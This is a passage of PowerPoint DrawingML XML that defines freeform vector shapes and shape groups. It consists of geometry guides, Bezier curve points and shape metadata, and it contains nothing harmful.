                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE0E5BB1-7336-4A17-AA95-074A3539835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53" y="3806"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 10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5 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88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89 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:move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4" name="Freeform 684">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE5BBFDE-2F1F-46FA-927F-E274D151A89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5" y="3419"/>
                <a:ext cx="468" cy="545"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 198"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 198"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 198"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 198"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 198"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 198"/>
                  <a:gd name="T11" fmla="*/ 11 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 198"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 198"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 198"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 198"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 198"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 198"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 198"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 198"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 198"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 198"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 198"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 198"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 198"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 159 w 198"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 198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5" name="Freeform 685">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{055448E5-0127-4842-BD5A-8652FD3C134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5" y="3419"/>
                <a:ext cx="468" cy="545"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 198"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 198"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 198"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 198"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 198"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 198"/>
                  <a:gd name="T11" fmla="*/ 11 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 198"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 198"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 198"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 198"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 198"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 198"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 198"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 198"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 198"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 198"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 198"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 198"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 198"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 159 w 198"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 198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6" name="Freeform 686">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDB73671-5C97-4363-B138-1E31BF3B31A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86" y="3390"/>
                <a:ext cx="156" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 9 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 53 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 30 h 41"/>
                  <a:gd name="T10" fmla="*/ 29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4" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="9" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="21"/>
                      <a:pt x="13" y="16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30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="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7" name="Freeform 687">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88529415-431A-45C3-812A-691CB89E509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65" y="3265"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39" y="1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8" name="Freeform 688">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79D403D7-F494-4D3B-A39F-A034931815B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65" y="3265"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39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9" name="Freeform 689">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C8C694C-517C-4A78-8DD6-70B9D30CCB0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38" y="3898"/>
                <a:ext cx="24" cy="390"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 10"/>
                  <a:gd name="T1" fmla="*/ 165 h 165"/>
                  <a:gd name="T2" fmla="*/ 9 w 10"/>
                  <a:gd name="T3" fmla="*/ 12 h 165"/>
                  <a:gd name="T4" fmla="*/ 0 w 10"/>
                  <a:gd name="T5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5">
                    <a:moveTo>
                      <a:pt x="8" y="165"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="131"/>
                      <a:pt x="10" y="16"/>
                      <a:pt x="9" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="8"/>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="6350" cap="rnd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0" name="Freeform 690">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8998F591-B0FB-4C92-BB51-ECE2DD50CA5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53" y="3806"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 10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5 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88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89 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:move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1" name="Freeform 691">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5041FA4D-E528-4F2C-92E3-E205B11533A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53" y="3806"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 10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5 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88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89 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:move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2" name="Freeform 692">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9F2BC7B-52AC-4AAD-B9B3-C03D12E68F1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5" y="3419"/>
                <a:ext cx="468" cy="545"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 198"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 198"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 198"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 198"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 198"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 198"/>
                  <a:gd name="T11" fmla="*/ 11 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 198"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 198"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 198"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 198"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 198"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 198"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 198"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 198"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 198"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 198"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 198"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 198"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 198"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 159 w 198"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 198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solidFill>
                <a:srgbClr val="CCFFCC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3" name="Freeform 693">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12000C55-E6C4-4763-9147-4892097E75A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5" y="3419"/>
                <a:ext cx="468" cy="545"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 198"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 198"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 198"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 198"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 198"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 198"/>
                  <a:gd name="T11" fmla="*/ 11 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 198"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 198"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 198"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 198"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 198"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 198"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 198"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 198"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 198"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 198"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 198"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 198"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 198"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 159 w 198"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 198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4" name="Freeform 694">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37A2A0D4-3E53-4493-B09D-32CAB5106A5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86" y="3390"/>
                <a:ext cx="156" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 9 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 53 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 30 h 41"/>
                  <a:gd name="T10" fmla="*/ 29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4" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="9" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="21"/>
                      <a:pt x="13" y="16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30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="29" y="39"/>
                    </a:cubicBezTo>
                    <a:close/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5" name="Freeform 695">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12EFD305-2E0D-4EC5-9E78-D0FEB717BEE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65" y="3265"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39" y="1"/>
                    </a:cubicBezTo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6" name="Freeform 696">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A600FDE6-B8B0-4DF3-883B-CF44D942F7E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65" y="3265"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39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7" name="Freeform 697">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AF79F71-36ED-41A6-9F98-20F40995049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38" y="3898"/>
                <a:ext cx="24" cy="390"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 10"/>
                  <a:gd name="T1" fmla="*/ 165 h 165"/>
                  <a:gd name="T2" fmla="*/ 9 w 10"/>
                  <a:gd name="T3" fmla="*/ 12 h 165"/>
                  <a:gd name="T4" fmla="*/ 0 w 10"/>
                  <a:gd name="T5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5">
                    <a:moveTo>
                      <a:pt x="8" y="165"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="131"/>
                      <a:pt x="10" y="16"/>
                      <a:pt x="9" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="8"/>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="6350" cap="rnd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654" name="Group 698">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFE376C1-5DA8-425F-B9A7-48DBA162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1322" y="3580614"/>
              <a:ext cx="940700" cy="399982"/>
              <a:chOff x="-1652" y="6058"/>
              <a:chExt cx="2253" cy="954"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="912" name="Freeform 699">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAFC0F9F-2609-4D00-86BB-0F7F5738658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50" y="6058"/>
                <a:ext cx="451" cy="590"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 451"/>
                  <a:gd name="T1" fmla="*/ 0 h 590"/>
                  <a:gd name="T2" fmla="*/ 0 w 451"/>
                  <a:gd name="T3" fmla="*/ 470 h 590"/>
                  <a:gd name="T4" fmla="*/ 451 w 451"/>
                  <a:gd name="T5" fmla="*/ 590 h 590"/>
                  <a:gd name="T6" fmla="*/ 451 w 451"/>
                  <a:gd name="T7" fmla="*/ 123 h 590"/>
                  <a:gd name="T8" fmla="*/ 0 w 451"/>
                  <a:gd name="T9" fmla="*/ 0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1" h="590">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="1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3" name="Freeform 700">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EFDEA91-DAC9-40A8-8456-FEA52A1022F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752" y="6256"/>
                <a:ext cx="1353" cy="362"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1353"/>
                  <a:gd name="T1" fmla="*/ 241 h 362"/>
                  <a:gd name="T2" fmla="*/ 902 w 1353"/>
                  <a:gd name="T3" fmla="*/ 0 h 362"/>
                  <a:gd name="T4" fmla="*/ 1353 w 1353"/>
                  <a:gd name="T5" fmla="*/ 121 h 362"/>
                  <a:gd name="T6" fmla="*/ 454 w 1353"/>
                  <a:gd name="T7" fmla="*/ 362 h 362"/>
                  <a:gd name="T8" fmla="*/ 0 w 1353"/>
                  <a:gd name="T9" fmla="*/ 241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3" h="362">
                    <a:moveTo>
                      <a:pt x="0" y="241"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="902" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1353" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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4" name="Freeform 701">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4966CFDB-E3C8-43AB-BC5A-C69F7A7EB2A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298" y="6181"/>
                <a:ext cx="899" cy="708"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 899"/>
                  <a:gd name="T1" fmla="*/ 241 h 708"/>
                  <a:gd name="T2" fmla="*/ 0 w 899"/>
                  <a:gd name="T3" fmla="*/ 708 h 708"/>
                  <a:gd name="T4" fmla="*/ 899 w 899"/>
                  <a:gd name="T5" fmla="*/ 467 h 708"/>
                  <a:gd name="T6" fmla="*/ 899 w 899"/>
                  <a:gd name="T7" fmla="*/ 0 h 708"/>
                  <a:gd name="T8" fmla="*/ 0 w 899"/>
